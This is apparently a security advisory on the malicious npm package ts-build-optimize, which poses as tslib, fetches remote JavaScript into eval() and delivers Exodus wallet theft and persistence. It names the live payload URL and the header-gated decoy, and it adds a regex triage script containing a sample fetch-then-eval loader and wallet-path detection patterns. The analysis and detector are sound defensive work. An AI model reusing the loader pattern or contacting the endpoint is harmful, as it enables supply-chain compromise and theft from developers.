Vulnerability
Malicious code in ts-build-optimize (npm)
## Source: amazon-inspector (51c637ab7c13ca2f592502f3444ebb24b291422b6388563d04fb8f7ae9030d5a)

The package masquerades as a TypeScript helper library (README is lifted from Microsoft's tslib and references --importHelpers, __extends, __assign, and a fake github.com/microsoft/ts-build-optimize/releases URL). The shipped index.js has nothing to do with TypeScript helpers: it exports a function `buildoptimize` whose default arguments are hardcoded to fetch `https://verceljs-kappa.vercel.app/icons/23` and pass the response body directly to `eval()` (index.js:61-63 sets `uuri = "https://verceljs-kappa.vercel.app/icons/"`; index.js:79 executes `eval(JSON.parse(b))`; the function is exported at index.js:95). Any consumer who imports this package and calls `buildoptimize()` — which the name and README imply is a build-time optimizer — will execute arbitrary attacker-controlled JavaScript on the installer/build machine. The Vercel destination is mutable (the author can swap the payload at any time), no hash or signature is verified, and the hosting domain is unrelated to Microsoft or any legitimate tslib publisher. The C2 endpoint serves a benign 6,758-byte PNG decoy when requested without the package's hardcoded `bearrtoken: logo` HTTP header (so casual scanners and `curl` see only an image), but returns 53,347 bytes of JSON-wrapped, heavily-obfuscated JavaScript when the header is present.
Static analysis of the fetched second stage (sha256 of the raw response body fd082d2406d65aa78d5f1028e11dc23e85d63f07c459fb048d08236a65590b99; sha256 of the JSON-decoded JavaScript source 47d235dad37c7fb86e231822a4c231344cbd006e58b8cb9a013b064c1a521eb8 — captured 2026-05-15, payload is mutable) shows wallet-theft and persistence functionality: references to the Exodus cryptocurrency wallet on macOS (`/Library/Application Support/exodus.wallet`) and Windows (`/AppData/Roaming/Exodus/exodus.wallet`); functions named `installWindows`, `uninstallWindows`, `installMac`, `uninstallMac`, `isInstalledWindows`, and a `macPlistPath` constant indicating per-OS persistence install/uninstall machinery; heavy use of `child_process.execSync`/`exec` to invoke shell commands; and a top-level `setInterval(main, 30000)` re-execution loop. The combination of name-squat on a widely-used Microsoft package, README impersonation, header-gated decoy, and a remote-eval primitive that delivers wallet-theft + persistence makes this an unambiguous supply-chain attack.
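A static triage check for the loader pattern described above, as an added example (not code from the advisory, the package, or Amazon Inspector): it flags source in which a hardcoded URL and a network call coexist with `eval()`/`new Function()`, and separately reports the `child_process`, `setInterval` and Exodus wallet-path indicators seen in the second stage. The indicator names, regexes and both sample sources are this example's own constructions; the sample loader uses a placeholder domain.

```javascript
// Added example: regex-based triage of a package entry file for the
// "fetch remote body, hand it to eval()" loader shape plus second-stage indicators.
// Indicator names and patterns are this example's own, not from the advisory.
const INDICATORS = {
  dynamic_eval: /\beval\s*\(|new\s+Function\s*\(/,
  remote_fetch: /\bhttps?\.(?:get|request)\s*\(|\bfetch\s*\(|\brequire\(\s*["'](?:axios|node-fetch|got)["']/,
  hardcoded_url: /https?:\/\/[^\s"'`)]+/g,
  shell_exec: /\bchild_process\b|\bexec(?:Sync)?\s*\(/,
  reexec_loop: /\bsetInterval\s*\(/,
  wallet_path: /exodus\.wallet|AppData[\\/]+Roaming[\\/]+Exodus|Application Support[\\/]+exodus/i,
};

// Returns which indicators fire; remote_eval is the composite loader primitive
// (eval/new Function + a network call + a hardcoded URL in the same file).
function auditSource(src) {
  const findings = {};
  for (const [name, re] of Object.entries(INDICATORS)) {
    if (name === "hardcoded_url") {
      const urls = src.match(re) || [];
      if (urls.length) findings[name] = urls;
    } else if (re.test(src)) {
      findings[name] = true;
    }
  }
  findings.remote_eval = Boolean(findings.dynamic_eval && findings.remote_fetch && findings.hardcoded_url);
  return findings;
}

// Constructed sample with the loader shape (placeholder domain, never executed here).
const SAMPLE_LOADER = `
const https = require("https");
function buildoptimize(uuri = "https://example.invalid/icons/") {
  https.get(uuri + "23", (res) => {
    let b = ""; res.on("data", (d) => (b += d)); res.on("end", () => eval(JSON.parse(b)));
  });
}`;

// Constructed benign sample: a tslib-style helper with no network or eval.
const SAMPLE_BENIGN = `exports.__assign = Object.assign || function (t) {
  for (var s, i = 1; i < arguments.length; i++) { s = arguments[i]; for (var p in s) t[p] = s[p]; }
  return t; };`;

// CLI: node audit.js <file...>; with no arguments it audits the two samples.
if (typeof module !== "undefined" && require.main === module) {
  const fs = require("fs");
  const files = process.argv.slice(2);
  const inputs = files.length ? files.map((f) => [f, fs.readFileSync(f, "utf8")])
                              : [["sample-loader", SAMPLE_LOADER], ["sample-benign", SAMPLE_BENIGN]];
  for (const [name, src] of inputs) console.log(name, JSON.stringify(auditSource(src)));
}
```

A `remote_eval` hit on a package whose README promises build-time helpers is the review-blocking signal; the other indicators are context for the analyst, not verdicts on their own.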
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
FIRST.org publishes EPSS daily. Coverage isn't universal: pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands.
No exploitation, limited impact or prevalence